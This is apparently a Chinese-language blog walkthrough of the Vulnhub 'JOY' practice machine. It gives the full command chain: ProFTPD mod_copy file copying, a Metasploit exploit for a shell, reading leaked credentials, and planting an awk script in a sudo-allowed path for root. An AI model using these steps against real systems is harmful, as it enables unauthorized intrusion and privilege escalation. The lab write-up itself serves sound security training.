Digitalworld.local: JOY Vulnhub靶场题解

前期准备

镜像下载

https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

环境配置:

在VM以net连接打开虚拟机

使用的机器:

攻击机:kali linux,ubuntu
靶机:ip随配(192.168.119.137)

渗透开始

1.nmap发现主机,并扫描其ip信息

nmap -A 192.168.119.137
在这里插入图片描述

2.发现ftp相关的知识,尝试登陆ftp

ftp 192.168.119.137
账号:anonymous
密码:空
ls
cd download
ls
cd ..
cd upload
ls
get directory

在这里插入图片描述
退出ftp

cat directory
在这里插入图片描述
由于version_control存在于patrick路径中,我们是没有权限去获取的,所以尝试将其转移到/upload路径中

telnet 192.168.119.137 21
site cpfr /home/patrick/version_control
site cpto /home/upload/version_control

在这里插入图片描述

3.下载相关文件,发现版本漏洞

访问路径 ftp://192.168.119.137/upload/version_control
直接下载一个文件,打开
在这里插入图片描述

由上 proftpd的版本是存在漏洞的,并且告诉了webroot路径,可以使用msf里面的脚本攻击

4.使用msf获得shell,并尝试提权

use exploit/unix/ftp/proftpd_modcopy_exec
set rhosts 192.168.119.137
set sitepath /var/www/tryingharderisjoy

在这里插入图片描述
python -c 'import pty; pty.spawn("/bin/bash")'

ls 
cd ossec
ls
cat patricksecretsofjoy

发现账户以及密码
在这里插入图片描述

5.得到另一个账号,尝试提权

切换账户登陆
su -l patrick
在这里插入图片描述

6.将提权的脚本写入对应的路径中

可以看到在路径 /home//patrick/script/test 是免密的
那我们可以尝试上传脚本文件到此路径中
本地主机编写脚本
echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
使用ftp上传到upload

cd upload
put test

在这里插入图片描述
在使用telnet转换一下路径

site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test

在这里插入图片描述

7.提权

sudo /home/patrick/script/test
cd /root
cat proof.txt
author-secret.txt

在这里插入图片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章